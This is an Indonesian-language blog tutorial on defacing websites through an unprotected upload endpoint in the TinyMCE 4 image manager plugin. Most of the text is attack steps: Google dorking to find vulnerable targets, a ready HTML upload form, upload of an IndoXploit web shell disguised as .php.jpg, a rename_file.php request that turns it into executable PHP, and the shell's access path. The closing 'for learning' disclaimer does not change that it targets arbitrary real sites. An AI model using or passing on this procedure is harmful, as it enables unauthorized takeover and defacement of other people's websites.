Deface Metode TinyMCE 4 Image Manager With CSRF
Assalamualaikum Wr.Wb
Baiklah kembali lagi dengan saya Mr.Adewa
Pada kali ini saya akan memberikan Tutorial Deface Metode TinyMCE 4 Image Manager With CSRF
Thanks to Typical Idiot Security
Author TinyMCE 4 Image Manager=Khunerable
Author CSRF=Anoaghost
Sebelum itu kita harus mempersiapkan sesuatu
-Shel
Gunakan shel IndoXploit aja
-Script Deface (Saya rasa udah punya sendiri sendiri)
-CSRF
<form enctype="multipart/form-data" action="site.com/path/tinymce/plugins/image/upload.php" method="post"><input type="file" name="upl" multiple="multiple"><input type="submit" value="Proccess!"></form>-Setelah Upload shel
sitecom/path/tinymce/plugins/image/rename_file.php?current_name=namafilesebelumdiganti.php.jpg&new_name=namafilebaru.php-Exploit
PATH/tinymce/plugins/image/upload.php
(Upload.php ganti dulu menjadi image.php biar kita tau apakah bisa upload gambar atau tidak) Jika bisa baru ganti menjadi upload.php
1. Dorking dulu di Google (Mana tau dapat yg vuln)
2. Jika sudah masukkan exploit di atas
Contoh
site.co.li/PATH/tinymce/plugins/image/upload.php
3. Ambil csrfnya dan ubah di bagian sitenya
4. Simpan dengan format html seperti adewa.html
5. Click CSRF tersebut dan upload shell kalian dengan format php.jpg, Jika sukses akan ada seperti ini
6. Jika sudah masukkan exploit yg ke dua untuk merubah nama format shel kita. Bagian current_name=adewa.php.jpg adalah shel yg saya upload tadi
Shel tersebut akan kita ubah menjadi .php dengan cara bagian paling akhir new_name= ubah menjadi php
Seperti adewa.php
new_name=adewa.php
Jika sukses merubah akan ada seperti ini
7. Untuk mengakses shel kalian
site.com/tinymce/plugins/image/uploads/namashelkalian.php
Jika kurang paham kalian bisa bertanya di bawah ini
Jika kurang paham nonton aja video di bawah ini
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb